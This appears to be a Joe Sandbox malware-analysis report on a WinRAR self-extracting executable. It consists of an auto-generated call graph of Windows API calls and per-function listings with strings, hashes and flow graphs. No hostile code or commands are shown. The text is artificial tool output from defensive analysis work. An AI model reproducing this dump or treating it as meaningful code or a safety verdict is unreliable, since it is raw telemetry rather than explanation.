cbc6e4 25018->24823 25018->24824 25019 cb1fac CharUpperW 25019->25020 25020->25018 25020->25019 25072 caf3fa 82 API calls 2 library calls 25020->25072 25023 cbec50 25022->25023 25024 cbdbeb SetEnvironmentVariableW 25023->25024 25026 cbdc0e 25024->25026 25025 cbdc36 25025->24817 25026->25025 25027 cbdc2a SetEnvironmentVariableW 25026->25027 25027->25025 25029 cbb70b GetObjectW 25028->25029 25030 cbb6fe 25028->25030 25032 cbb71a 25029->25032 25073 cba6c2 FindResourceW 25030->25073 25033 cba5c6 4 API calls 25032->25033 25035 cbb72d 25033->25035 25036 cbb770 25035->25036 25037 cbb74c 25035->25037 25038 cba6c2 13 API calls 25035->25038 25047 cada42 25036->25047 25089 cba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25037->25089 25040 cbb73d 25038->25040 25040->25037 25042 cbb743 DeleteObject 25040->25042 25041 cbb754 25090 cba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25041->25090 25042->25037 25044 cbb75d 25091 cba80c 8 API calls 25044->25091 25046 cbb764 DeleteObject 25046->25036 25100 cada67 25047->25100 25052 cb90b7 25053 cbeb38 8 API calls 25052->25053 25054 cb90d6 25053->25054 25054->24836 25056 cbacab GdiplusShutdown CoUninitialize 25055->25056 25056->24852 25058->24846 25059->24851 25061 cab15a GetVersionExW 25060->25061 25062 cab196 25060->25062 25061->25062 25062->24980 25064 cbec50 25063->25064 25065 cb0828 GetSystemDirectoryW 25064->25065 25066 cb085e 25065->25066 25067 cb0840 25065->25067 25066->24980 25068 cb0851 LoadLibraryW 25067->25068 25068->25066 25069->24974 25071 cc3e1b 25070->25071 25071->25006 25071->25071 25072->25020 25074 cba7d3 25073->25074 25075 cba6e5 SizeofResource 25073->25075 25074->25029 25074->25032 25075->25074 25076 cba6fc LoadResource 25075->25076 25076->25074 25077 cba711 LockResource 25076->25077 25077->25074 25078 cba722 GlobalAlloc 25077->25078 25078->25074 25079 cba73d GlobalLock 25078->25079 25080 cba7cc GlobalFree 25079->25080 25081 cba74c __InternalCxxFrameHandler 25079->25081 25080->25074 25082 cba754 CreateStreamOnHGlobal 25081->25082 25083 cba76c 25082->25083 25084 cba7c5 GlobalUnlock 25082->25084 25092 cba626 GdipAlloc 25083->25092 25084->25080 25087 cba79a GdipCreateHBITMAPFromBitmap 25088 cba7b0 25087->25088 25088->25084 25089->25041 25090->25044 25091->25046 25093 cba638 25092->25093 25094 cba645 25092->25094 25096 cba3b9 25093->25096 25094->25084 25094->25087 25094->25088 25097 cba3da GdipCreateBitmapFromStreamICM 25096->25097 25098 cba3e1 GdipCreateBitmapFromStream 25096->25098 25099 cba3e6 25097->25099 25098->25099 25099->25094 25101 cada75 __EH_prolog 25100->25101 25102 cadaa4 GetModuleFileNameW 25101->25102 25103 cadad5 25101->25103 25104 cadabe 25102->25104 25146 ca98e0 25103->25146 25104->25103 25106 cadb31 25157 cc6310 25106->25157 25107 ca959a 80 API calls 25110 cada4e 25107->25110 25109 cae261 78 API calls 25112 cadb05 25109->25112 25144 cae29e GetModuleHandleW FindResourceW 25110->25144 25111 cadb44 25113 cc6310 26 API calls 25111->25113 25112->25106 25112->25109 25124 cadd4a 25112->25124 25121 cadb56 ___vcrt_FlsGetValue 25113->25121 25114 cadc85 25114->25124 25177 ca9d70 81 API calls 25114->25177 25116 ca9e80 79 API calls 25116->25121 25118 cadc9f ___std_exception_copy 25119 ca9bd0 82 API calls 25118->25119 25118->25124 25122 cadcc8 ___std_exception_copy 25119->25122 25121->25114 25121->25116 25121->25124 25171 ca9bd0 25121->25171 25176 ca9d70 81 API calls 25121->25176 25122->25124 25141 cadcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 25122->25141 25178 cb1b84 MultiByteToWideChar 25122->25178 25124->25107 25125 cae159 25129 cae1de 25125->25129 25184 cc8cce 26 API calls 2 library calls 25125->25184 25127 cae16e 25185 cc7625 26 API calls 2 library calls 25127->25185 25130 cae214 25129->25130 25134 cae261 78 API calls 25129->25134 25135 cc6310 26 API calls 25130->25135 25132 cae1c6 25186 cae27c 78 API calls 25132->25186 25134->25129 25136 cae22d 25135->25136 25137 cc6310 26 API calls 25136->25137 25137->25124 25139 cb1da7 WideCharToMultiByte 25139->25141 25141->25124 25141->25125 25141->25139 25179 cae5b1 50 API calls __vsnprintf 25141->25179 25180 cc6159 26 API calls 3 library calls 25141->25180 25181 cc8cce 26 API calls 2 library calls 25141->25181 25182 cc7625 26 API calls 2 library calls 25141->25182 25183 cae27c 78 API calls 25141->25183 25145 cada55 25144->25145 25145->25052 25147 ca98ea 25146->25147 25148 ca994b CreateFileW 25147->25148 25149 ca996c GetLastError 25148->25149 25153 ca99bb 25148->25153 25150 cabb03 GetCurrentDirectoryW 25149->25150 25151 ca998c 25150->25151 25152 ca9990 CreateFileW GetLastError 25151->25152 25151->25153 25152->25153 25155 ca99b5 25152->25155 25154 ca99ff 25153->25154 25156 ca99e5 SetFileTime 25153->25156 25154->25112 25155->25153 25156->25154 25158 cc6349 25157->25158 25159 cc634d 25158->25159 25170 cc6375 25158->25170 25187 cc91a8 20 API calls _abort 25159->25187 25161 cc6352 25188 cc9087 26 API calls _abort 25161->25188 25163 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25165 cc66a6 25163->25165 25164 cc635d 25166 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25164->25166 25165->25111 25168 cc6369 25166->25168 25168->25111 25169 cc6699 25169->25163 25170->25169 25189 cc6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25170->25189 25172 ca9bdc 25171->25172 25174 ca9be3 25171->25174 25172->25121 25174->25172 25175 ca9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25174->25175 25190 ca6d1a 77 API calls 25174->25190 25175->25174 25176->25121 25177->25118 25178->25141 25179->25141 25180->25141 25181->25141 25182->25141 25183->25141 25184->25127 25185->25132 25186->25129 25187->25161 25188->25164 25189->25170 25190->25174 25192 cc7ce1 _abort 25191->25192 25193 cc7ce8 25192->25193 25194 cc7cfa 25192->25194 25227 cc7e2f GetModuleHandleW 25193->25227 25215 ccac31 EnterCriticalSection 25194->25215 25197 cc7ced 25197->25194 25228 cc7e73 GetModuleHandleExW 25197->25228 25198 cc7d9f 25216 cc7ddf 25198->25216 25202 cc7d76 25207 cc7d8e 25202->25207 25212 cc8a91 _abort 5 API calls 25202->25212 25204 cc7d01 25204->25198 25204->25202 25236 cc87e0 20 API calls _abort 25204->25236 25205 cc7dbc 25219 cc7dee 25205->25219 25206 cc7de8 25237 cd2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25206->25237 25208 cc8a91 _abort 5 API calls 25207->25208 25208->25198 25212->25207 25215->25204 25238 ccac81 LeaveCriticalSection 25216->25238 25218 cc7db8 25218->25205 25218->25206 25239 ccb076 25219->25239 25222 cc7e1c 25225 cc7e73 _abort 8 API calls 25222->25225 25223 cc7dfc GetPEB 25223->25222 25224 cc7e0c GetCurrentProcess TerminateProcess 25223->25224 25224->25222 25226 cc7e24 ExitProcess 25225->25226 25227->25197 25229 cc7e9d GetProcAddress 25228->25229 25230 cc7ec0 25228->25230 25234 cc7eb2 25229->25234 25231 cc7ecf 25230->25231 25232 cc7ec6 FreeLibrary 25230->25232 25233 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25231->25233 25232->25231 25235 cc7cf9 25233->25235 25234->25230 25235->25194 25236->25202 25238->25218 25240 ccb09b 25239->25240 25244 ccb091 25239->25244 25241 ccac98 _abort 5 API calls 25240->25241 25241->25244 25242 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25243 cc7df8 25242->25243 25243->25222 25243->25223 25244->25242 25420 cbb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23425 cbe44b 23426 cbe3f4 23425->23426 23428 cbe85d 23426->23428 23454 cbe5bb 23428->23454 23430 cbe86d 23431 cbe8ca 23430->23431 23442 cbe8ee 23430->23442 23432 cbe7fb DloadReleaseSectionWriteAccess 6 API calls 23431->23432 23433 cbe8d5 RaiseException 23432->23433 23434 cbeac3 23433->23434 23434->23426 23435 cbe966 LoadLibraryExA 23436 cbe979 GetLastError 23435->23436 23437 cbe9c7 23435->23437 23438 cbe98c 23436->23438 23439 cbe9a2 23436->23439 23440 cbe9d9 23437->23440 23443 cbe9d2 FreeLibrary 23437->23443 23438->23437 23438->23439 23444 cbe7fb DloadReleaseSectionWriteAccess 6 API calls 23439->23444 23441 cbea37 GetProcAddress 23440->23441 23450 cbea95 23440->23450 23445 cbea47 GetLastError 23441->23445 23441->23450 23442->23435 23442->23437 23442->23440 23442->23450 23443->23440 23446 cbe9ad RaiseException 23444->23446 23447 cbea5a 23445->23447 23446->23434 23449 cbe7fb DloadReleaseSectionWriteAccess 6 API calls 23447->23449 23447->23450 23451 cbea7b RaiseException 23449->23451 23463 cbe7fb 23450->23463 23452 cbe5bb ___delayLoadHelper2@8 6 API calls 23451->23452 23453 cbea92 23452->23453 23453->23450 23455 cbe5ed 23454->23455 23456 cbe5c7 23454->23456 23455->23430 23471 cbe664 23456->23471 23458 cbe5cc 23459 cbe5e8 23458->23459 23474 cbe78d 23458->23474 23479 cbe5ee GetModuleHandleW GetProcAddress GetProcAddress 23459->23479 23462 cbe836 23462->23430 23464 cbe82f 23463->23464 23465 cbe80d 23463->23465 23464->23434 23466 cbe664 DloadReleaseSectionWriteAccess 3 API calls 23465->23466 23467 cbe812 23466->23467 23468 cbe82a 23467->23468 23470 cbe78d DloadProtectSection 3 API calls 23467->23470 23482 cbe831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23468->23482 23470->23468 23480 cbe5ee GetModuleHandleW GetProcAddress GetProcAddress 23471->23480 23473 cbe669 23473->23458 23477 cbe7a2 DloadProtectSection 23474->23477 23475 cbe7a8 23475->23459 23476 cbe7dd VirtualProtect 23476->23475 23477->23475 23477->23476 23481 cbe6a3 VirtualQuery GetSystemInfo 23477->23481 23479->23462 23480->23473 23481->23476 23482->23464 25389 cba440 GdipCloneImage GdipAlloc 25442 cc3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25462 cd1f40 CloseHandle 23619 cbcd58 23621 cbce22 23619->23621 23626 cbcd7b 23619->23626 23630 cbc793 _wcslen _wcsrchr 23621->23630 23647 cbd78f 23621->23647 23623 cbd40a 23624 cb1fbb CompareStringW 23624->23626 23626->23621 23626->23624 23627 cbca67 SetWindowTextW 23627->23630 23630->23623 23630->23627 23633 cbc855 SetFileAttributesW 23630->23633 23638 cbcc31 GetDlgItem SetWindowTextW SendMessageW 23630->23638 23642 cbcc71 SendMessageW 23630->23642 23646 cb1fbb CompareStringW 23630->23646 23671 cbb314 23630->23671 23675 cba64d GetCurrentDirectoryW 23630->23675 23677 caa5d1 6 API calls 23630->23677 23678 caa55a FindClose 23630->23678 23679 cbb48e 76 API calls 2 library calls 23630->23679 23680 cc3e3e 23630->23680 23635 cbc90f GetFileAttributesW 23633->23635 23645 cbc86f _abort _wcslen 23633->23645 23635->23630 23637 cbc921 DeleteFileW 23635->23637 23637->23630 23639 cbc932 23637->23639 23638->23630 23640 ca4092 _swprintf 51 API calls 23639->23640 23641 cbc952 GetFileAttributesW 23640->23641 23641->23639 23643 cbc967 MoveFileW 23641->23643 23642->23630 23643->23630 23644 cbc97f MoveFileExW 23643->23644 23644->23630 23645->23630 23645->23635 23676 cab991 51 API calls 2 library calls 23645->23676 23646->23630 23649 cbd799 _abort _wcslen 23647->23649 23648 cbd9c0 23650 cbd9e7 23648->23650 23653 cbd9de ShowWindow 23648->23653 23649->23648 23649->23650 23654 cbd8a5 23649->23654 23696 cb1fbb CompareStringW 23649->23696 23650->23630 23653->23650 23693 caa231 23654->23693 23656 cbd8d9 ShellExecuteExW 23656->23650 23663 cbd8ec 23656->23663 23658 cbd8d1 23658->23656 23659 cbd925 23698 cbdc3b 6 API calls 23659->23698 23660 cbd97b CloseHandle 23661 cbd989 23660->23661 23662 cbd994 23660->23662 23699 cb1fbb CompareStringW 23661->23699 23662->23648 23663->23659 23663->23660 23665 cbd91b ShowWindow 23663->23665 23665->23659 23667 cbd93d 23667->23660 23668 cbd950 GetExitCodeProcess 23667->23668 23668->23660 23669 cbd963 23668->23669 23669->23660 23672 cbb31e 23671->23672 23673 cbb3f0 ExpandEnvironmentStringsW 23672->23673 23674 cbb40d 23672->23674 23673->23674 23674->23630 23675->23630 23676->23645 23677->23630 23678->23630 23679->23630 23681 cc8e54 23680->23681 23682 cc8e6c 23681->23682 23683 cc8e61 23681->23683 23685 cc8e74 23682->23685 23691 cc8e7d _abort 23682->23691 23714 cc8e06 23683->23714 23686 cc8dcc _free 20 API calls 23685->23686 23690 cc8e69 23686->23690 23687 cc8ea7 HeapReAlloc 23687->23690 23687->23691 23688 cc8e82 23721 cc91a8 20 API calls _abort 23688->23721 23690->23630 23691->23687 23691->23688 23722 cc7a5e 7 API calls 2 library calls 23691->23722 23700 caa243 23693->23700 23696->23654 23697 cab6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23697->23658 23698->23667 23699->23662 23708 cbec50 23700->23708 23703 caa23a 23703->23656 23703->23697 23704 caa261 23710 cabb03 23704->23710 23706 caa275 23706->23703 23707 caa279 GetFileAttributesW 23706->23707 23707->23703 23709 caa250 GetFileAttributesW 23708->23709 23709->23703 23709->23704 23711 cabb10 _wcslen 23710->23711 23712 cabbb8 GetCurrentDirectoryW 23711->23712 23713 cabb39 _wcslen 23711->23713 23712->23713 23713->23706 23715 cc8e44 23714->23715 23716 cc8e14 _abort 23714->23716 23724 cc91a8 20 API calls _abort 23715->23724 23716->23715 23717 cc8e2f RtlAllocateHeap 23716->23717 23723 cc7a5e 7 API calls 2 library calls 23716->23723 23717->23716 23719 cc8e42 23717->23719 23719->23690 23721->23690 23722->23691 23723->23716 23724->23719 23732 ccc051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25391 cbe455 14 API calls ___delayLoadHelper2@8 25392 cbc793 107 API calls 4 library calls 25463 cc7f6e 52 API calls 2 library calls 25444 cc8268 55 API calls _free 24661 ca9f7a 24662 ca9f88 24661->24662 24663 ca9f8f 24661->24663 24664 ca9f9c GetStdHandle 24663->24664 24666 ca9fab 24663->24666 24664->24666 24665 caa003 WriteFile 24665->24666 24666->24662 24666->24665 24667 ca9fcf 24666->24667 24668 ca9fd4 WriteFile 24666->24668 24670 caa095 24666->24670 24672 ca6baa 78 API calls 24666->24672 24667->24666 24667->24668 24668->24666 24668->24667 24673 ca6e98 77 API calls 24670->24673 24672->24666 24673->24662 25464 ca1f72 128 API calls __EH_prolog 25394 cba070 10 API calls 25445 cbb270 99 API calls 24722 ca9a74 24726 ca9a7e 24722->24726 24723 ca9ab1 24724 ca9b9d SetFilePointer 24724->24723 24725 ca9bb6 GetLastError 24724->24725 24725->24723 24726->24723 24726->24724 24727 ca9b79 24726->24727 24728 ca981a 79 API calls 24726->24728 24727->24724 24728->24727 25396 ca1075 84 API calls 25397 cba400 GdipDisposeImage GdipFree 25446 cbd600 70 API calls 25398 cc6000 QueryPerformanceFrequency QueryPerformanceCounter 25427 cc2900 6 API calls 4 library calls 25447 ccf200 51 API calls 25466 cca700 21 API calls 25468 ca1710 86 API calls 25430 cbad10 73 API calls 25432 ccb4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25448 cbc220 93 API calls _swprintf 25404 ccf421 21 API calls __vswprintf_c_l 25405 ca1025 29 API calls 25433 cbf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25471 cbff30 LocalFree 25248 ccbb30 25249 ccbb39 25248->25249 25250 ccbb42 25248->25250 25252 ccba27 25249->25252 25253 cc97e5 _abort 38 API calls 25252->25253 25254 ccba34 25253->25254 25272 ccbb4e 25254->25272 25256 ccba3c 25281 ccb7bb 25256->25281 25259 ccba53 25259->25250 25260 cc8e06 __vswprintf_c_l 21 API calls 25261 ccba64 25260->25261 25262 ccba96 25261->25262 25288 ccbbf0 25261->25288 25265 cc8dcc _free 20 API calls 25262->25265 25265->25259 25266 ccba91 25298 cc91a8 20 API calls _abort 25266->25298 25268 ccbada 25268->25262 25299 ccb691 26 API calls 25268->25299 25269 ccbaae 25269->25268 25270 cc8dcc _free 20 API calls 25269->25270 25270->25268 25273 ccbb5a __FrameHandler3::FrameUnwindToState 25272->25273 25274 cc97e5 _abort 38 API calls 25273->25274 25279 ccbb64 25274->25279 25276 ccbbe8 _abort 25276->25256 25279->25276 25280 cc8dcc _free 20 API calls 25279->25280 25300 cc8d24 38 API calls _abort 25279->25300 25301 ccac31 EnterCriticalSection 25279->25301 25302 ccbbdf LeaveCriticalSection _abort 25279->25302 25280->25279 25282 cc4636 __fassign 38 API calls 25281->25282 25283 ccb7cd 25282->25283 25284 ccb7dc GetOEMCP 25283->25284 25285 ccb7ee 25283->25285 25286 ccb805 25284->25286 25285->25286 25287 ccb7f3 GetACP 25285->25287 25286->25259 25286->25260 25287->25286 25289 ccb7bb 40 API calls 25288->25289 25290 ccbc0f 25289->25290 25291 ccbc16 25290->25291 25293 ccbc85 _abort 25290->25293 25295 ccbc60 IsValidCodePage 25290->25295 25292 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25291->25292 25294 ccba89 25292->25294 25303 ccb893 GetCPInfo 25293->25303 25294->25266 25294->25269 25295->25291 25296 ccbc72 GetCPInfo 25295->25296 25296->25291 25296->25293 25298->25262 25299->25262 25301->25279 25302->25279 25307 ccb8cd 25303->25307 25312 ccb977 25303->25312 25306 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25309 ccba23 25306->25309 25313 ccc988 25307->25313 25309->25291 25311 ccab78 __vswprintf_c_l 43 API calls 25311->25312 25312->25306 25314 cc4636 __fassign 38 API calls 25313->25314 25315 ccc9a8 MultiByteToWideChar 25314->25315 25319 ccc9e6 25315->25319 25325 ccca7e 25315->25325 25317 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25321 ccb92e 25317->25321 25318 ccca07 _abort __vsnwprintf_l 25322 ccca78 25318->25322 25324 ccca4c MultiByteToWideChar 25318->25324 25319->25318 25320 cc8e06 __vswprintf_c_l 21 API calls 25319->25320 25320->25318 25327 ccab78 25321->25327 25332 ccabc3 20 API calls _free 25322->25332 25324->25322 25326 ccca68 GetStringTypeW 25324->25326 25325->25317 25326->25322 25328 cc4636 __fassign 38 API calls 25327->25328 25329 ccab8b 25328->25329 25333 cca95b 25329->25333 25332->25325 25334 cca976 __vswprintf_c_l 25333->25334 25335 cca99c MultiByteToWideChar 25334->25335 25336 cca9c6 25335->25336 25337 ccab50 25335->25337 25341 cc8e06 __vswprintf_c_l 21 API calls 25336->25341 25343 cca9e7 __vsnwprintf_l 25336->25343 25338 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25337->25338 25339 ccab63 25338->25339 25339->25311 25340 ccaa30 MultiByteToWideChar 25342 ccaa49 25340->25342 25354 ccaa9c 25340->25354 25341->25343 25360 ccaf6c 25342->25360 25343->25340 25343->25354 25347 ccaaab 25349 cc8e06 __vswprintf_c_l 21 API calls 25347->25349 25355 ccaacc __vsnwprintf_l 25347->25355 25348 ccaa73 25351 ccaf6c __vswprintf_c_l 11 API calls 25348->25351 25348->25354 25349->25355 25350 ccab41 25368 ccabc3 20 API calls _free 25350->25368 25351->25354 25353 ccaf6c __vswprintf_c_l 11 API calls 25356 ccab20 25353->25356 25369 ccabc3 20 API calls _free 25354->25369 25355->25350 25355->25353 25356->25350 25357 ccab2f WideCharToMultiByte 25356->25357 25357->25350 25358 ccab6f 25357->25358 25370 ccabc3 20 API calls _free 25358->25370 25361 ccac98 _abort 5 API calls 25360->25361 25362 ccaf93 25361->25362 25365 ccaf9c 25362->25365 25371 ccaff4 10 API calls 3 library calls 25362->25371 25364 ccafdc LCMapStringW 25364->25365 25366 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25365->25366 25367 ccaa60 25366->25367 25367->25347 25367->25348 25367->25354 25368->25354 25369->25337 25370->25354 25371->25364 25407 ccc030 GetProcessHeap

                                                                                              Executed Functions

                                                                                              Function 00CBDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00CB0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00CB087C
                                                                                                • Part of subcall function 00CB0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CB088E
                                                                                                • Part of subcall function 00CB0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB08BF
                                                                                                • Part of subcall function 00CBA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CBA655
                                                                                                • Part of subcall function 00CBAC16: OleInitialize.OLE32(00000000), ref: 00CBAC2F
                                                                                                • Part of subcall function 00CBAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CBAC66
                                                                                                • Part of subcall function 00CBAC16: SHGetMalloc.SHELL32(00CE8438), ref: 00CBAC70
                                                                                              • GetCommandLineW.KERNEL32 ref: 00CBDF5C
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CBDF83
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CBDF94
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00CBDFCE
                                                                                                • Part of subcall function 00CBDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBDBF4
                                                                                                • Part of subcall function 00CBDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBDC30
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CBDFD7
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00CFEC90,00000800), ref: 00CBDFF2
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00CFEC90), ref: 00CBDFFE
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00CBE009
                                                                                              • _swprintf.LIBCMT ref: 00CBE048
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CBE05A
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00CBE061
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 00CBE078
                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00CBE0C9
                                                                                              • Sleep.KERNEL32(?), ref: 00CBE0F7
                                                                                              • DeleteObject.GDI32 ref: 00CBE130
                                                                                              • DeleteObject.GDI32(?), ref: 00CBE140
                                                                                              • CloseHandle.KERNEL32 ref: 00CBE183
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3049964643-3743209390
                                                                                              • Opcode ID: 10b0ac0206ac1734a570bc1bafcaff6cd057fa2d64186ac78c05a3bd1b550e32
                                                                                              • Instruction ID: 87db6cdba0d8ed761fca349c12857a474e2bf67903ce721f010d1d2e961c6fbc
                                                                                              • Opcode Fuzzy Hash: 10b0ac0206ac1734a570bc1bafcaff6cd057fa2d64186ac78c05a3bd1b550e32
                                                                                              • Instruction Fuzzy Hash: 3C610671505385AFD320AFB5EC89FBF37ACEB45700F04042AF946962A2DB789E44D762
                                                                                              Function 00CBA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 812 cba6c2-cba6df FindResourceW 813 cba7db 812->813 814 cba6e5-cba6f6 SizeofResource 812->814 816 cba7dd-cba7e1 813->816 814->813 815 cba6fc-cba70b LoadResource 814->815 815->813 817 cba711-cba71c LockResource 815->817 817->813 818 cba722-cba737 GlobalAlloc 817->818 819 cba73d-cba746 GlobalLock 818->819 820 cba7d3-cba7d9 818->820 821 cba7cc-cba7cd GlobalFree 819->821 822 cba74c-cba76a call cc0320 CreateStreamOnHGlobal 819->822 820->816 821->820 825 cba76c-cba78e call cba626 822->825 826 cba7c5-cba7c6 GlobalUnlock 822->826 825->826 831 cba790-cba798 825->831 826->821 832 cba79a-cba7ae GdipCreateHBITMAPFromBitmap 831->832 833 cba7b3-cba7c1 831->833 832->833 834 cba7b0 832->834 833->826 834->833
                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6D5
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6EC
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA703
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA712
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CBB73D,00000066), ref: 00CBA72D
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00CBA73E
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CBA762
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00CBA7C6
                                                                                                • Part of subcall function 00CBA626: GdipAlloc.GDIPLUS(00000010), ref: 00CBA62C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CBA7A7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00CBA7CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 211097158-364855578
                                                                                              • Opcode ID: 5b58333f42809b0da3d30cb501d0ef0adb880983e663be73188880a76006dddf
                                                                                              • Instruction ID: 5b0a298e01830bf7947d0bb3c3cf93b6742cfc1ab03abbf7f4e5508ad63cdd72
                                                                                              • Opcode Fuzzy Hash: 5b58333f42809b0da3d30cb501d0ef0adb880983e663be73188880a76006dddf
                                                                                              • Instruction Fuzzy Hash: FF31B1B5605352AFC7109F61EC88F5FBBB8EF84750F04052AF895A2221EF31DD44DAA2
                                                                                              Function 00CAA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
